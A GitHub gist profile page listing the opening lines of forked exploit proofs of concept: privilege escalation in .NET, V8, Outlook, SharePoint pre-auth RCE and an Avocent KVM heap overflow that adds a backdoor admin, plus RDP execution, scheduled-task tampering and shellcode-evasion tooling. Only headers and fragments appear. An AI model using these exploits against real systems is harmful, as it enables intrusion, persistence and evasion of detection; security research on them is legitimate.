Skip to content

Instantly share code, notes, and snippets.

View ASkyeye's full-sized avatar
:octocat:
Super Hacker Bot - Verified by Github

ASkyeye

:octocat:
Super Hacker Bot - Verified by Github
492 followers · 16 following
View GitHub Profile
@ASkyeye
ASkyeye / CVE-2023-33127.cs
Created June 12, 2024 00:11 — forked from bohops/CVE-2023-33127.cs
CVE-2023-33127: .NET Cross-Session Privilege Escalation Exploit
// CVE-2023-33127 POC Exploit: .NET Cross-Session Privilege Escalation
// Ref: https://bohops.com/2023/11/27/abusing-net-core-clr-diagnostic-features-cve-2023-33127/
using System;
using System.Runtime.InteropServices;
using System.Threading;
using System.Diagnostics;
using System.Security.Principal;
using System.IO.Pipes;
using System.IO;
@ASkyeye
ASkyeye / CVE-2024-4761.js
Created May 21, 2024 00:14 — forked from mistymntncop/CVE-2024-4761.js
// Build d8 using:
// a) Run once
// git checkout 6f98fbe86a0d11e6c902e2ee50f609db046daf71
// gclient sync
// gn gen ./out/x64.debug
// gn gen ./out/x64.release
//
// b)
// Debug Build:
// ninja -C ./out/x64.debug d8
@ASkyeye
ASkyeye / test_dll.c
Created April 11, 2024 15:03 — forked from Homer28/test_dll.c
DLL code for testing CVE-2024-21378 in MS Outlook
/**
* This DLL is designed for use in conjunction with the Ruler tool for
* security testing related to the CVE-2024-21378 vulnerability,
* specifically targeting MS Outlook.
*
* It can be used with the following command line syntax:
* ruler [auth-params] form add-com [attack-params] --dll ./test.dll
* Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch).
*
* After being loaded into MS Outlook, it sends the PC's hostname and
@ASkyeye
ASkyeye / demo.c
Created April 10, 2024 09:29 — forked from mistymntncop/demo.c
NtWaitForDebugEvent + WaitForMultipleObjects
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <windows.h>
#include "nt_crap.h"
#define ArrayCount(arr) (sizeof(arr)/sizeof(arr[0]))
#define assert(expr) if(!(expr)) { *(char*)0 = 0; }
@ASkyeye
ASkyeye / rdp-execute.py
Created March 7, 2024 18:30 — forked from jborean93/rdp-execute.py
POC for running processes over RDP - Very WIP
# Copyright: (c) 2024, Jordan Borean (@jborean93) <jborean93@gmail.com>
# MIT License (see LICENSE or https://opensource.org/licenses/MIT)
"""POC for running exe's over RDP
This is a very rough attempt at trying to run an exe using a headless RDP
connection. It aims to be able to provide an interactive console session as
well as a headless one.
Requires aardwolf - https://github.com/skelsec/aardwolf as a Python dependency.
@ASkyeye
ASkyeye / Invoke-GhostTask.ps1
Created January 5, 2024 12:47 — forked from Workingdaturah/Invoke-GhostTask.ps1
A PS1 Script intended to edit Scheduled Tasks via Registry Keys
function Invoke-GhostTask {
param (
[string]$TaskName,
[switch]$ShowTasks,
[string]$Id,
[string]$TargetTask,
[string]$TargetBinary,
[string]$Date,
[string]$Help
)
@ASkyeye
ASkyeye / rdp_pack.cpp
Created December 31, 2023 22:56 — forked from odzhan/rdp_pack.cpp
Compression using RDP API
/**
Compression using undocumented API in rdpbase.dll
RDPCompress supports four algorithms : MPPC-8K, MPPC-64K, NCRUSH and XCRUSH.
This code only supports compression and decompression using MPPC algorithms because these were the easiest to figure out.
The MPPC compression ratio is very similar to LZSS, so this could be quite useful for shellcode trying to evade detection.
I was unable to get decompression working for NCRUSH and XCRUSH, which is why I'm publishing this.
@ASkyeye
ASkyeye / SharePwn_public.py
Created December 15, 2023 11:48 — forked from testanull/SharePwn_public.py
SharePoint Pre-Auth Code Injection RCE chain CVE-2023-29357 & CVE-2023-24955 PoC
# -*- coding: utf-8 -*-
import hashlib
import base64
import requests, string, struct, uuid, random, re
import sys
from collections import OrderedDict
from sys import version
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# too lazy to deal with string <-> bytes confusion in python3 so forget it ¯\_(ツ)_/¯
@ASkyeye
ASkyeye / sleepy.md
Created December 14, 2023 20:39 — forked from EvanMcBroom/sleepy.md
Sleepy - Python Tooling for Sleep

Sleepy - Python Tooling for Sleep

Thank you to SpecterOps for supporting this research and to Sarah, Cody, and Daniel for proofreading and editing! Crossposted on the SpecterOps Blog.

TL;DR: You can use sleepy to automate common tasks when working with Sleep code.

Raphael Mudge created the embeddable scripting language, Sleep, in April 2002. Sleep was designed to extend Java applications and has been used in few projects; most notably Cobalt Strike.

@ASkyeye
ASkyeye / asmpwn.py
Created December 9, 2023 15:08 — forked from aemmitt-ns/asmpwn.py
Remote pre-auth heap buffer overflow exploit for Avocent KVMs
import socket, struct, sys
p32 = lambda x: struct.pack(">I", x)
p16 = lambda x: struct.pack(">h", x)
p8 = lambda x: struct.pack(">b", x)
# ASMP heap overflow exploit creates new applianceAdmin user
def exploit(hostname, username="Backdoor", password="Backdoor"):
global socks # python closes out of scope sockets
port = 3211 # this is hardcoded in the binary
print(f"[*] Exploiting ASMP on {hostname} port {port}")